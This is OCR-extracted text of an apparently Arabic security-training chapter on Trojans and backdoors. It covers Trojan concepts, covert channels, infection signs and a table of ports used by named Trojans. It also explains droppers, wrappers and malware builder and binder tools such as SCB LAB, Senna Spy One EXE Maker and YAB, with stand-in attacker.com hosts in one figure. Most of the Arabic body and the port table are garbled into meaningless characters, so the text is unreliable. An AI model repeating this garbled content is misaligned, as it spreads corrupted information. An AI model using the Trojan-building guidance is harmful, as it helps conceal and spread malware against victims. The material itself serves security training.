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(6.1) 



'Backdoor j S-^j^A 3 \ ^Ic (Jliaj L» jl (jl_^.jjii3l ^ a ofc^ a\ ^\ a^j^ ^il ^S^j (jl j& j3I ^ C5 juj r ijj3l 

•IjJa (j-aVl JJ^*-^ (j^ J-^*^ jn^ a lg_J ^ajflJ A-AaslSI Liajl 6^ jll £>i& l Qi^i'i .BackdOOr J 6^1 J^>ia 4 U ■n^l (j-<a ^Uaill jl A^JjuJI 

.Backdoorj foljjia <i^J 

6^1 J^a 4 U ^i^l ^1 jjl 
?6^lj^)Ia (jL^aa. £jL^a *Uc dla JJ (jl£ ^ 

6^1 J^a (jl > ^>^> ^ j^. j ^^-Sc dj|^)juj^<Jl 

o^lj^Ja > (jc l a.*<U 
D^lj^)Ja (jL^aa. (Jj3 (j-a ixi^JjaixJl QJjg niall ial_L<Jl 
S^l J^a (jl > ^->^> AjJa S^LjaxJl ^ijl^ill 
?6^lj^)Ia (jL-aa> (j^^a (jC ^ aiajVI L-jL (^5^ 
6^1 J^a (jl > ^Ludjj CjI j^I 
^Uaill ^Jl (J jj^a jl\ (jxi d^I j^)Ja (jL^aa. I^jS (j^ flJJ ^^jll <all^x» (j^lall 

6^lj^)Ia (jL^a^. 4 a 9l £ a ^lx*I^)J 

Backdoor j jjJa <i^a^J .ua (jljikVI ^uLc; 

6^1 J^a (jl > ^->^> ^jluj 4 jqj^ 



Ja>u]| £-uj ufl j-uj jit d^A ^ 



Penetration Testing 



Trojan Concepts 



Anti-Trojan 
Software 




Trojan Infection 



Countermeasures 



aye 



Types of Trojans 




Trojan Detection 
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(TROJAN CONCEPTS) c^jjSM ^li- (6.2) 



11a t a t >■> j <( jL^.jjj1] ajjujLujVI ^jaILJ! Vjl 1^ U jc^ t^Uaillj 4£jJo3I jjl j>» Jc LaA jjijbj (backdoor) jj^ ^-^j uW-jj-^ 

(j>» 4 a iklLoLxi]! DJ£juj JJ^VI isLLollj 4(jlj*.jjjll lljl ^ ^ (jlaljcl 4(jlj*.jjjll a) laJLujj (jxa (jlajxll <j^aLa £ tall JaLoiJj (jlj*.jjjll ^ajuikJl 



?(What is a Trojan) ^ dfa ^ j> ctejj^t ^ 

(jjJ.j| Jj^all j t^jjj jAljJ e-ljj ^ n^J ^al jll LaJJJ (J^-J J(£ fcfl ^jjliaJl <J<L LgI j\ *^Uij ^jC-VI (jJJ jl *s ^Li j 

(jj^V CjIjj^j (j-G ^aC- jlL 6<J,JA (jL^^Jl ^ju ^j-ij^l jj^all ^^1^ 'UJ^* 1 6 C5^0^] J U1 W ^ J .^-^ lP 3 ^^ ^5^* > *a^J) 

jL^aJ! ^ijj ^jjj^ljjiall Jil^l .jjj£ JUl^l <1jAa3! J] <!Lk^U <A\a\\ jAk (jL^a^J! \ > ^ jjjipj (jjliA ttj^LuASj 

m llJx£ jUJaVlj frluijll ^>'J 4 lP->J^ (J^ J^J '^-^J ^ 4JjAa1I dl^ia tlgJ j^^J ^ ^LftJudU 

<3jjojj 6 jl^J> (jl jl 4_i^jJa3l ^liJl ^5 j3 L_fllstjJal ^^ic j^JJJ La Ullc. ^al^Jl ^axJJ ^j^Jj 44JIsl!I 4 jjt uJI dili ^<il jill 

(j^aj£3l <Lj ^jl ^j£-<uJl (j* j Jjja^ ^cxiljjj] (jlj*J! (_3^^ 6(il3i ^t_>.'>ijj ^jIj Ld^JC ^j^3 j tlLjaj j\ c ala <j| j^jj Lo C5 J t C 

£L-aA^ (jj^J (jl clA^ ^ > 10 ^ .S-^J^- (J udl JjuJI Cjl j (jLdJjVl AiUaJ ^al3jl jLoajlj ^^JjoiaIIj (j^aljkll t . iL^al) 

^^ic ^^JjouJI (jj^J l^JS ^^jll j 4_iik 4jilla j (jj^J ^5 ^c^lijjl! I^A (jl c^*^ ^ J '(^^ 4_jllc 4 JJT >*>1 dlli (jj^J ^) 4-C Jjjoui ^cxilijJ 
aIa^LujI p$ j£ <Lj (Jjrt^l ^1 Ajajx-G (jjJ (jjj^.VI 4 ^ a\ laJ > >i j£ ^Vlmj (jl Uiajl (j£-<uJl (j-d 4_l^jJall jl^J> 6 j^.l jJjUjjoj ^ ,l^J 

4£jJj Ijjj^j cJJj ^1 tills Jid <c jjj^d jjsJ! (denial- of -service) <*<^\ £y* (jUj^JI ^ c_j\£jjV <j^uJall jj jjj-*£ jW> 

.^Vll ^ j^l ^ DALnet IRC 

(^11 jj^ iLjjil! diVU^j'V! Jll^l (> Jl^ ^ ^1 Internet relay chat (IRC)^ ^ ^ DALnet) 

(jL^jjjll (jili jLiLdl till <Lj 4_i^jJall ^jl£ li] ,4_i^jJall 1 * ^ I^Lujj CjI jUldVI (j>» (_^ jloi^ll (jjoij cJ-^ ^^J^ 3 1 ^^/yj^ ? JJ*^^ 

jjslSI 4£jjuo3I J jj^ jll jSjj* ^11 jjII JiLd) (_^J^.I ^txil JJ CjJJJJj 46^ CAiLJ! cJ^ ,J *^ tdiUi jIslaII Jaj tdAiLJ! L_fli^. A j£ <l3 
tilli (j>» JJ^l (J JJ^a jll (_^ jJjaixi 6^Ujl 6JXJ (J^IsUjujI 4jjL^<i (j^J o^ljjla (jL^a^./(jL^.jjjJ! , jLlLdVl ^ij I— ^ llijjj <j ^"jj^axi 

CllIJJJ LaJjj Cj! jLiLdVl 6^1_1J Jc JaslSI 4 j£ <Lj o^ljjia (jU^^. (jli ;^-L^jll ^aJ lil /o^ljjia (jU^^. ^IXjolL ^ala (J?^\ ^.JjkjjoixJl A^LoJ C^ill 

^^U^jJalj jlgA Jc (^J^VI 4 JJJaJl j| j^VI (J^H 

jjjJI CjUK (jia ASi uo^ll ^Ujc^I JIjjI Jj^j Jll 3 rthiVl .a£jj^3I ^j^Vl 3 ^hiVl jjjj a£^\ ^ ^Uaj Jljlkl 

Jc ^Uajll (jl jlkl ^aJ li] .(jljlk^U (j^alA 4-jJajx-d 6jL^ J j\ {cleOT text) J 0**i J a£jjAa1I CjKj/MI jjc 

m A ui\ ul^Ji CjUi jlx-<Jl (j>» lA JJC. jl JJJ^ll CjIaKj (jJxJ^JjalxJl ^LgjojI (Jj^ i dJ Jc Ij^lfl Jj^.^11 (jj^J ^3 t^^Jjuall 
Ijjj ^a J^Jl (jj^l jAj^o£ ^Jsu ^aUaj JajJJ ^1J^J tlA^ijj jll CjUI J^-VI Jc ^SjJJ Jjia (jL^a^. ttilli J] 4iLjaVlj 

.cjUil jjlVl cJ-^^ ^j'y^l a1 laill ( . ujujjj JUIUj '(^spoofing)^)^^-} 

lend mc crccait t jrd d-eloil> 




Her* it nry credrt c-ard number dind cjcpn~c d-ade 



SGrd me Face beak account inS-arrnjtiOfii 



Here is rrrv Fate book lajgin and profile 




Send me ^-banking Icrgin info 



-------------- 



Herts i*. mv bj-nk ATM and pincode 




Victim in Chicago 
Inft'dt-d with Trojan 



Victim in London 
inle-ct^d with Trojain 



Victiin in Parii 
lnf«ctiKd with Trojan 
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(Communication Paths: Overt And Covert Channels) ^i>^lj iukJt cAj&\ jU^ 
diL* jLlaII jl cAiLiJ! JiJ jjIS sUS 6<^a ^uilxJI sUSIl jl l£j^j cs-**-* Covert ls* 6 cs-^* j Overt 

.dlLa j1x-<J!j CjUUJI Jil3 (J^joiJ (j-osuj 4^jjuo13 4_Lal 4jjj (j-<uia oUSl) o^A .A^jjuJI <£jjui (j-ajJa 

^a <jjjoJI CjI jj£3l .<£jjaJI CjUUJI (Jij a iklLujj ^^jll j ^^cjjai jj*-I1 jLlaaII 4<^a AjjjoJI SUal! t j^.VI ( ; ul^JI ( _ 5 lc ^)J^ 
^joij ^il! j i(Tunnet)(j^ ' A -^ ^^-^ ■ L - <-S^* Jj^j^ jj^ cs* ^AjLuM cs-^ <JL>^' 

<Jajuj| jj I&jc- t ftju^SI clA^ cillil tdiUi jIslxJI (J^Liil 4-jj^ <»— ^ ? i^iLujj V U» j^c . j^.1 <J j^ j^j^ ^^J^ r*-^ U' cJ j^ j-^jj^ 
Attractive mode j^ ^ ^ .'So^ sUSlI (jj£j (jl cAjLuII L — ^ j> ^jUr. c?' ^Uaill ^1 l_u3LujI ^l^kiujl 

m i v^'im^l jl^-aJI ^^ic Backdoor ^u/^ ^j^l sUSJI ^i^-all ^jl (j£-oj c_ 6*^1 jj^a q\ >^*^ <J^ 

jLoj ^ukJI sUill .cjUUJI Jfcl <a£jJJ! J jj j^ill ^Lk3 <>jja <c CjVU^j^U jL^ jA : (Overt channel) ^SUJI jjjjt 

l— itlnlajll j pocker.exe j& cj! jjSII JULg ^> > oji 

Jajuoji .(j-ftVI ^jojUjuj t all^j <Ljiaj 6a£jJo3I jl jj jji^ll ^Uaj J^b cijUi jlx-<JI JSjj sUSl! ^ ; (Covert channel) ^jj^t cjljjiil 

.Trojan.exe ^j^^ JH^>i 

(Purpose Of Trojans) S Jljjla oU** ^^u-l ^> (jJajil) 

.Jjt uSSlI ^Uij ^ ^IgJI cjULJI JI^jIojI jl cJi^ 
. {malicious file)^^ cjULJIj ^(adware) i(spyware)o»**$S jJjj lS^j 

.CjLuj Jj^l 4-a^l£^> ^cxil jjj AjjUII jlj^Jl (JjJaaU 

.^xj jo Jjj^ajll l-luo^ backdoor 
.cjU^JI jj] Proxy Server AjauJal l jl^ aJu^\ 
. DDoS^W^ ^(botnet) ^ jjjj ^ ^ujJI jj jjj-<£ ^I^l 
.^jjjilVl ^jjjII l5j^-j blastingj (spamming)$J^y j^j^ 



^(What Do Trojan Creators Look For) lj*jUa djl^L ^iM U 

Jc. l1j^j13 ^a^klaaJ 6^1 Jjia 3 u ^i^l .l^jlc SjiaJjuJ! 3jojjUui j (_^J^VI 3 <JajVl diUi jIscaII A^jjoJ lfrJjtj£ ^aJJ ^Iajjj/S j| JjJa 4 

^jjA^.1^13 ^<uujj jl (j^j l^-jl ,(^j>.I^a3I) (jL^jjjll l_jjI£ ^1 djUi jlx-<JI d^a cJ^jj *^lcl ^jj tdj^j lili 6L_a^JI uJI djU» jls^ 

jIslxJI ^^ic <J jj^^JIj La (j^akjuj jl^J> (^^Jc (jauud^jll Uiajl ^ iklLujJ Jl (j^J r&j-aAxJ! JC-^U Ja^S a iklLujJ V S^ljjJa 4 L^Al 

4_JOll_JUd^il jl 4 t ^1 A. \ \ 

;4,JUi) ljU>uu^U dij j (Trojan) Sjl jj^ j ^ Luu) 

.^jjoull ^ cilli^j 6 (domain registration)^^^ J j^ > ^ l^l^iuit ji^j ^Ij tjUjjVI AiUaj djUjkxi 

^Jjjll JjjUc ^L-JJjll CjLqJI^ JJuJl Clil j t^gjjl^Jl (JIj^jVI JJUJ Cjl 4^ jJJ^lVl ^J^^ J^ ^ ^ ^-jLal^Jl ^^L^ 

.^C^y*l\ .JJjjll pLuljl ^jlc £ al\ ^cLaaJ ^jjl&lyi 
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^ jjill i jj^L^II ^Vj^S li^ jj^j jl ^j^dj 4±^al\ Cjli JaxJI jjl jjI j presentations ^ ^ j^l <yj-^ 

.A^LVI ^1 jxJl ^Ijj) Jia 

^aJJ <C jJjuu* <iajauVl (jC Sj^S f^-^ (J^ J 6 ^_J <j^LkJl JJ Jjjd^t ^1.^1 ml ^ jl j-alaiVI 4 ^ dJ t fl^Jl 

^ ^ l \ 1 JJ j i i * J^ -v. I ^ In. 1 ^ iq | >^^J ^ u l 

,4_i^jL<JI jJ3 FTP ^-jIIaj L_fl^JI jj jj;^^ ~\ ikiLuji (j^j 
I^jj ^ilt j t^Uajlt ^ SjI jjL £ jjj ^ <jV ^UajSI ^ J jj^JI iaaa oj^jj ^ Script kiddie 's 

m ^l\ t^j^ > ^> cJ^*^ c ^ J 6 JJ^* cJ^-^ ^*^J J* > ^alt (j^ajall <Jc. ^jL c' % n^> ;4jIjsu l_a j > <aJJ 

lAA CjI Vil.nlt lit 



Credit card 
in Formation 



Finnncinl dntn {bank account 
numbers, social security numbers, 
insurance information t etc.) 



U^ing the victim's computer for illegal purpo^^ 
buch as to hack, bcun, flood, or infiltrate other 
machines on the network or Internet 




Account data [email addresses, 
passwords, user names, etc^ 



Calendar information concerning 
the? victim's whereabouts 



Confidential 
documents 




Act 




Hacker 



Indications Of A Trojan Attack **\jJ* ?J** J J*J ^l^j^l 
(jja^l j *W ^\-^&\ cJ.^ ' ^ Backdoor ^ (j^al^JI ^Uaill cjUUJI <ajjoJ ^ o ^ o (J^jj^/S^ljj^a (jU^^ 

lal II ^aJJ ^3 tit ^Uaill ^^^-Sc ^J^Uat ^1x^.1^31 > nj ^j£^Jj 4 6^lj^)Ia3 <jJa^)C ^Jj^aJ ^aUaill ^ <L^)IaJ tiL ^aLaJI ^Uailt 

ialixJlj ;4_Jjji3! (JjLuj^)3Ij tdj^^Iiltj Cjlfla^LJlj ^jjj^IVI -^)^ l!^ Ailla^ JjLujj a I laJkJ j ^aUailt J D^!j^)ia A L V .'S^ c ' 
|6^tj^)ia (JjS C-P 3 ^*^ ^•^ c ' ^ (J^alaJt ^aUailt ^^Ic iaa».^\j ^3 ^^jlt dit jjuj^Jt (J^axJ ^^Jj Uu3 ,ti!3i Ldj jliixJt 

m A^SLl ^ISlS c> ^^lijj £JflJ CD-ROM £ - 
^ d iLai q > ^ ^t JJ jJJ^^t ^jj^alo A-l^ jJ o^lct ^aJJ 
,L_fl^Jt jj jjj-o^lt c _ 5 ic ^jc. <juj^j^ CjIsuj>» JJ^ 3 
_4juUaJt ^j-d (JjLojj jt (_3^^J ^-C-^a 
. jLaaJtj (jjl^Jt ^jjjjUJt jtjjt L_fljUaj (JJJ^C ^aJJ 
.L_llk^a3t ^j-ajilt jt 6<£jjua3t (J j^-« 6^a^ j>Jt (Jj3 ^j-d ^Jt-nJa JJC. ulj 
_<J ^j>^>fl J^*3^ cJ Jl ^ ; ll uiaJt JJ J-Q Cjl JjliXJ ^aJJ 
^UujVt djliUaJ jjjt j3 j^JaJ ^JC- ^tjjai dltiLiJ 
.IP Q^kl ^ajL <J ^-aUJt JJjJf^lt J^J> jt cJ^St Jti j£oli ISP 
.L_fl^Jt (jC A y *M (JjUi jlstxJt (jC JJJ^t ^JjajSU ^JjjUlt 

■C**^ 1 ^ (J^J^ij lIaxJ V jt CjLujjjjilt AjLaaJt ^cxit jj (JjJasu ^aJJ 

.^al^xJt JaJjjuj g-lilkt 
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i . i^lfl al l J ^jl ( ^ Qr- - Ic. LjuiI j t llflJ j J ^ U a^l l 4_juj\_juj 
.^jalaJI dibl^cl jl 4j^L5J| 4jqU jJjiu 

.Windows 4*-^ jj 

4_JuaSJ fi t £3j ^j^d dlj^JJ ^jl ^JjJ^LaSI JjuIj^ 

_4_jaiaj ^litj JJ jJJ-a£3l (JjXjudJ d fltfljj 

-L UJI <> LjSju Ctrl+Alt+Del 

jJ-a JJC- cJ^^ lAlSl&/l^aja ^aJJ ^c^l jJl jl jj£l<Jl (Jlaxjll 
.Off jl Oil £^ ^juaij eliJj <Jj^JJ jj jjja^l 4_jujljai 



(Common Ports Used By Trojans) SJljjla £t*a* <> ^Vim^ l jJUaI) 

^^Ic ^jli^j jj* jjaa£ jl^j> cJ^ .^j^W <JL^j*VI t^Ij£ aj t8>i j^ ; <JjLujj3Ij ^jjl&lVI ^j^t cJ^-^j J ffi ujIj <JLujj]j jj3I cIjIjj^j 

,4jiilaj <J£3 <Lflj (jUajjoaVlj <jLaij!>lI a^JjS 

"listening" j ^gfo* c_iVU> ^Ua AaJ iaUJI j 4^.V^ cjVL^jVI o^ai ^ 

j^.1 ^Uaj £x» (jU-aj| s-lj^-V jiajjJ (J?'^ ^J ^1 ^aUajll £-*JjoiJ LaAjc. <!L^Jl c-Ludj] 

.jaJj .jAIg (j-d jj£I ^^hin 6^1 jjia ^ u ^i^l O^*^ .^Uajll (Jjxjujj S^lcj ^jj LdAic. (JistCfl St(lt£) 

.cjUUjII JSjI ^ j^Vl iaU^I j (listening) 



^2 4 6,JJa.l j 

^ULojVI 4JU ^ Jj^jj SjI jjL 



Port 


Trojan 


Port 


Trojan 


Port 


Trojan 


Port 


Trojan 


l 


Death 


1492 


FTP99CMP 


5569 


Robo-Had< 


?1544 


Girl Friend 1.0, &etd-1.35 




Senna Spy 


ibW 


Shfwka-Burfca 


££70-71 


DsepThroai 


23222 


Proslak 


21 


Blade Ruraimr, Dul^ TrOjaEi., Fore, 
Ifttflifblt! ftp, web€x, WinCfasri 


1B07 




6969 


j = t«-li dihdr. Priority 


23456 


Evil FTP, FTP 


n 


Shaft 


mi 


Shock raue 


70M 


Remote Grab 


7.G274 


Delta 


21 


Tiny Telnet Server 


19^3 


BackDow 1.OQ-LQ0 


7JOO-03 


Net Monitor 


3010042 


NefSphere 1^7a 


D 


Antigen^ Email Password Sender, 
Terrnlrtatof. wmfC wtnspy, 


Z00I 


Tro|an Cow 


77*9 


ICKiNer 


31J37-3A 


Back Onfirp, DeepBO 


51 


Hackers Paradise 




Ripper 


87S7 


Bac1tOFfice2000 


£133* 


NetSpy DK 


BO 


ixecutor 


Z115 


Bugs 


9872 75 


Portal of Doom 




B0 Whack 


A?l 


TCP Wrappers trojan 


2140 


The- invasor 


9W9 


MHQlef 




Prosaak 


456 


Hackeri Paradiie 


2155 


III u'siCih Mai le r. Ni rva na 


10G07 


Coma 1.0.9 




BiRGIuck.TW 




ini-KMrer . pnase zera, health i&v 




Matters Paradise 




Senna 5pv 


40412 


The 5pv 




fccasiz Backdoor 


1150 


The irw isor 




Progenktrojan 


4042 1-26 


Master Pa rad lie 


1001 


Silencer, WebEi 


4091 


WinCraih 






472SZ 


Of ltd 


1QU 


Dgly Tro=3n 


4567 


Fil«N4il 1 


12223 




50505 


Socket; 4 e Troie 




HAT 


4*M 


ICQTrojan 


11*45 46 


G*b*n6irt P NetBus 


507S6 


Fore 


1170 


fjyber Stfearn Strvtr, Voice 


sooo 


Bubbel 




Whacks- mole 


53001 


Remote Window* 

Shutdown 


1234 


Ultora Trojan 


5001 


Soe keis de Tf oie 


16969 


PnoriTv 


54121 


SCFVODIBUS .69-1,11 


114} 


SubSevsnl.0-1,8 






20001 


MilfenniUim 


61466 


Telecom mando 


H4S 




5400-02 


Blade Runner 


20034 


MetBos 2.0, Beta- 
MelBui 201 


65000 


Devil 
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TROJAN INFECTION (6.3) 



i"vWir.l a alia a l-uILojI ^jjjalij l_a jjoj t^jaakll ^ .Trojan Infection o^^j ( — s (jVl .(jLa-jjiill ^a&la^ t * li^U (^5!^ 

,<luaJI CA Ja ^j;^ £A ^ J laJ 4_jL^Ij 4_iajJall ^aUaj ^^ic D^lj^)ia ^jl - CllIJJj] ^a.1 g all <Jjfi 

?(How To Infect Systems Using A Trojan) **\jJ* d^** CP 4-^*a) & 

d^I Jjb (j\ > C-UJJJ ^aJJ La,jjc. ,6^1 J^>ia (jl > (Jj^ia (jc Asu <jc ^Uaill ^^ic LllLiawa^iJl j S^_a.Vl g a\\ (j^-oJ 

L^^Jl $ ^ clA^ (jW <^>1 tilljA Ljajj (j^lj tdii Ij ^glll <jJajC CAiUJ! aJ (jl Ja^a cJxij V 4jI£ t^aUajll ^^ic 

;o (jjlaj ^ d^I jjja jU-aa. ^l^klojU ^Uail! j jjj > ^j (jjLaaA^-al! .third-party 

rL^ Cruii all 4CjliLll o ^J.Laa>JJ ^AaJL haII ^.J^M . (jAAaJll] j)\ 4_jj^)aj ClA la a^J ^3 6^l^^)Ja 4 j > I ^jAxu <aJ ^jj 

^li ^laljauil) lij La I^jS ^aJ£J V La <L^)iaJ ^al^-all <Jj3 (J-g 1 $la ^^)J ^aJJ l— .4 alia a\\ 4jl±Uj^\ CjL^IcVI ^j^AaJLauJl ^l^a. ^aJJ 

.LjUIj ^Uaill ^^Jc D^lj^la lIiijjj 4_iLaC I,jjj 4_liAa>j .j^a^ Cilia $V jl ^*J JjjS jaillj 

^Jc. 6^1 C-UJJJ ^aJJ tdjlia^ll ^J3 ^aJJ Ld^JC m( ^j JJJ^IVI ^^It CjUs^d <j!^La. J^ 3 (jL^a. jLaJjlj (JJ^^l & *W ^J^J 

;lA jjc-j jjj^IIj 4_ia.ljVl J^-^^ "Llajjoilj 6dAjLla3I djlaUaJ JIa CjliLJl ^ A alia o ^1 jjl ^^^ic jilll LLaJ laJLuiAli 

.C-Loj^aJ ^aUaill ^^ic 6^1 J^>ia (jL-aa. L-JJJJJ ^aJJ Cl 



_a^J( -aUaill AjjuaJ) lIjI jiiJoll cIjjjjjj ^ajij ^il( j ^jLa. jjj ja» ^ ^3^- j 'dropper ^Lijj ;2 SjJa^il 




Attacker 



Malicious Code 




Exarnpfeof a Dropper 

Installation path: c \wi-ndo*i3V3yafci&m32V3veti K oa1:s . exe 
AllCOStart; IiKLM\So£t;^are\Hic: . . \nin\Ic3tplorcr, cue 



Malicious code 

Client address; client, attacker. corn 
Drop zone; drop2one.attacker.eom 



si 



A genuine application 

File name: chess.exe 
Wrapper data: Executable file 




Wrapper 



j| j^i ^l^aiujlj wrapper ^Lijj :3 SjlaaJI 



.Aj^iall jjjjj^II JU^> ^ £i±Z&(wrapper) ^L^j ^3 Uj ^Elitewrap 'Graffiti.exe 'petite.exe 

a alia o JjLojj J^La. ^ ^jj ji j^j [spreading) jjjjj^II l>-jj^ jj^j .^IjjL jL^aa. ;4 SjJaaJI 
^ mj^^ (automatic execution mechanism) cP^I ii2II > 

Sjlcj ^J^wftJ _Ailla^3l ^ajLaJl 6j^a.VI J^U. ^ jj^Iia jVl Lol (floppy disc) 4i>all (j-aljSVI J^U. j^ 

, jj jjj^II jlgja. ^^Jc. Ljlflli jniTn (jjj jjjjall (jli t jj jjia£JI (Jjxjujj 

<^jLauij J^LjII l!jI£jjuj tdjjjjV! CjLuj^j^ t^jjj^lVl ^^1^ cJjLujj <J!)la. ^ djLujjjjill jjou ^ 

.hijacking J * network redirecting <P2P ^jULII 
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■vfi»jj c>j uj^ ^^aJLu^ll .I^j ftjLjalt jA\ *Ui.y (jj-^l^xJI <JjS ^ Dropper ^v^hj .Dropper J^*-^ :5 Sjh^ll 

^ yr^J J 3 ' c^J 1 ^ j^j^ 3 ^ ^-^jj^ . (damage routine)^jJ\ j>^l ^ :6 Sj^t 

fclcl ;CjULJ! ji* <jj*J\ payloads J^jll ji jj^JI o^j*i Payload .payload 

a( jjk\ jlj^l J c_wi3l jl < (reformatted) <>al jSVl 

Dropper 




Attacker 



r 



a ! 

I 

Trojan Packet E 
-- -- |9I ■ — * 



chess. M 




Wrapper 



.- > 




11 — ■ 



■4 



Dropper 
2 drops the 



Trojan code execution 

Victim's System 



■ r 



http : //www . obi s . com : j^-a^ll 

cJ^»->^ lie .^jn^^l dilqjjin^l jl l-jUJVI l!^ j$ ^*ll C3 T .-- ^exe c5jj^ ci^l jj^ c -^j^ ^Akiujj Wrappers 

^ajli ^aJ ((jl^ JJ^ <Ajli3l ClilJjllI <-iLa*J ^ikjjaixJl ^J*lj V <^l) 4_iiliJl ^k S^l jjia C-UJJJ V jl ^JJ <Ul£ 'Wrapped EXE ^aujmall 

^ji ^ j£ ^.l^xJI ^^^jjoiaII <jjou31j o^Ua ciiiful! ajIac ^1) ix»^L<JI (wrapped application) 4L«^*j ^ <^^l ^nJajll ^ixjulL 
c^j ciLJ .ki^! t*la I^jSai sbVt ^ .petite.exe ^1 ^ l^iuL (DOS/WIN) binary ^ j£l c> ofi > 

Cjl auS jlill (jC L_Lu£3l Jc 6J^IS JJC. CjLuj Jj^l * U*^ '^JC- c flju&ll ^aJJ VI 6^1 J^all (j£-<uJl (j-a ^ J .(J^^l 

(Jia t flj| U» j]| (jiasu ^C^J (jl (j£-<uJl (j-d Wrappers '^lj C5'^^ t cJ^-b <J ^qV^I djliUl (j^ ^jAslSI J-^aJ (jl a ^ ^.l^xJl 

.( . u^aII ^Ljoj ^^ic lIasu ^>^-VI L-fllxJl LaliJ AjalaJI ^.Ij L_aL» (Jjjuujj 

.Istxi (^^a^VI ^1 jJI cjU j£-<i -iajjJ ^Akiujj "glueware" ^W^j^^ j^-^ ^ ^jW^ W^rappers t^^ll a^UII ^ 



.c^ 1 ^^ unwrapped 



Chess.exe 

Filesire: 90K 



_ Trojan.exe 




Chess.exe 

Filesbe: 110K 



(j-<i ^Li^^Li jii£l <Ljiaj ^Ia^Luj^U <Lla l^U^l ^.1 j djliLij j^a^> ^1 ^ii W^rapper 



Jjjjuj ^Jc. .Ajfll ^1 jl AjIjC-I (Jj^la (jC D^!j^)ia 



-Liinj ^ajlj (_^i3lj ^^UxJl lie 4_i^J jLaijU ^ajli ^.l^xJl c^^kl 4JLa. jk m jijjfi£l s j\ 

^Uu^Ludll 



Wrapper Covert Programs 



Kriptomatik 



jL, A*k\<^ jjj crackers ^ CjULJI j jjii^l < uj *> ^ ^ ^ill Wrapper Covert Kriptomatik 

.(Autorun)cP^I J^-^JI s ^ CD/DVD <jLw ^ ^ j^l ti^j^ c> 
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(Configure icons) cjUjLVI Jj^*j 

(Gather files) cjliLlI ^ - 
(Posts) cAS, jLU! - 
(Propagation) 
.^Jl i j^iall j t attributes ^ISIsil J a^ I ls ^ 

| J Filo Binder 




He Islame 


Frifl Path 


hie aize 


lniact To 


Extract To 


1 Ex 


jS*KRAWTtPC-FI5rTALL,TOI 


C:i,Docxment& and Setti-iqrfLfc^ftDes,.. 






*/*nar#% 


ft* 




C : VDocLtnent* ar»d SettrtQ^ ^Des . . . 


379 Kt> 











































L 










i 









0% 



Status : aj spread >cofnfnandt uncheclied. 



PkjoJnCour*: O0O6 



Advanced File Joiner *t 



^Laaii! ^ D^Axid ^13^' cJj^^^j cLu& lij j c aL> djlaLJI c alia^> ^jja j ^^inn ^Ujj j& Advanced File Joiner 

ASCII 4_L^aill CjUIaII qii aj 6 JtLJl J^f^ ^^Sc .SbVI <U j^JudJ CjULJI i>i& ^jJa *J t^su^al CjUL djUL 

V StaVl . j^jjllj t(jliLftVI) £ jjIIj (jjoij j-a iaia I jjl£ lij L_aL ^ MPEG ^Ail* jrt^l cjUL jjj ^aJI jl 

J£l ^ .DOC cjliU j JPEG 'BMP 'AVI head information ^^j^^^H^lM VI^U 




Fil* Name Fie Size Hi*! 

i«»lC:lDocun*Bnts and Sett^osV "ip«3fcl<ipy<tus*£- ««v SS 1 
□c:lDocuments and Settiigs^- .^^pe^opi^LMicjo^b. . . 392 let l 



Id To Fie 
? Path : 



-I 
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SCB LAB's - Professional Malware Tool <t 

jjL2u3I ^ ajj^I dUiiill , (Crypter) jj< -1 

Anti-Virtual Machine 

XOR Encryption, CryptAPI, TEA, DES, Blowfish, Base64, RC4, Ghost, Huffman, Skipjack, ThowFish 

jj^^ jjc. ^AxJ (Binder) -2 

.cjULJI j jjc. ^ (Downloader) -3 

.CjULJI t> ^j^i jj6 jaxJ (Spreader) j^il' -4 



SC8 LAB'S 

Professional Malware Tool 



Indei* Crypter Binder Do ,'nloader Spreader 



Path 



i SCB Lab.., C:\Documents and Settings\ Ad mi.,, No 



Add file 
Execute 
Build' 



icuments and Setting s\Admi . , , Ua 



No 



The attached files wetgti 714 KB 



OneFileExeMaker *t 



K-nrij S[i V 1 ir^ EW I Lflfcef 2000 J M 



Senna Spy One EXE Maker 2000 2.0a 



Official Website: http://sennaspy tsx org 



E Mail: icnrwi ip^holnuJ c 



ICQ JIN 397J327 



Jam nanv Het and make a uniqua EXE file. 
Thii program altaw |om a|t kind pF fitar owq, d(. pen, (at, jpg, bap 
Auicwtalic OCk file legiflet and Pack fief tupfinil 
Window* S*. Nf and ZCOO compatible ! 



Short File Hane 



P a i anKrt c r i 



I LI pen Podc Lapj f d 



! Ar.lirm 



LAZAPI'i.EXSE 



MCAFEE EXE 



tin 



QpenflZxecute 



Qpfln/FHecyre 



ArJdFte 



1= z - 



Java 



CofMh^nd Line F-a arisen 



lege 



f™ Hirwflifftd ^ Tamp 



Copy light (Ct 1938 20UO. Ely 



Spy | ^ Hitfe 



Actlflf ^ 

flpen/Ffficute r Pat* Fist? 

C Cow Or* 



<j duli! (j^J 4jI P^J^ ls^J -j^^J f ^ a ^ 



Yet Another Builder (YAB) * 

http : // y ab . sourcef or ge . net 

^lxAj^j _^I^L<iVI ^nijj jjjjuHllj ^cxi^ll ^lx»I^)J (JjJafll (j-«YAB 2^^^ 



https://www.facebook.com/tibea2004 



502 



e ^l!La ojjj^ ^ajjjoa l$\ j Pro Rat j^j^ j optix j^j^ ( ^*^ A + J^-^ cJ^f^ cs-^*- 3 ^ ^ -1 



Add Bind File Command: 



Select command to add: |Bind File 



—jf* 
— ' It-: 7 



Source File Path: p ySJUl jLo 



Browse... 



Target Path: | (Absolute) | 

I* Force path to exist. Random characters info... 



Creation Attributes: I Read-only f~~ Archive I - Hidden l~~ System 



Execution Method: (Execute asynchronously 



"3 



Execution Parameters: |~~ 



jdc A-AJ jj La 

I Try to delete file after execution. (Unavailable it registry startup" 0 *' 



I Abort all processes if this process fails. 



coin pei^ss bound 

file ^^h^w^dvanced^^j 



jic htt . /S I tlflJJ^I ale | ok Cancel | 



-id Yet Another Binder (YAB) V2.00 



File Command Options Tools Help 



ie I . Command Summe 



I 



jaLggfldaft baiaai o liidl 



Settings Saved: No Stub Built: No 



Root folder, temp 



Ji* 4LL£S 4fc O^JJ^' diiliui ^ill ja$\ select command to add <> j^t 

AjauJa3 1 jl^a. jl tSljl^a. qa jt> jj^ll ^ l^L ^iil t^lli j Bind File 
4j^& j\ L_aLJ) cJi*J Delete file or folder 

U jll^j Jj^jjll ^ ^UaiSI CjI^L^ ^ Execute file 

jfolder, system folder 
Jji^ull ^jc Error -UL^j V Message Box 



(Different Ways a Trojan Can Get Into a System) fUaSM ^1 Jj^a^it l^j>JI J*a*j £t ( ^ nti jjtll 



I n -st a nt 
fVl ess eng e r 
appli cat ions 



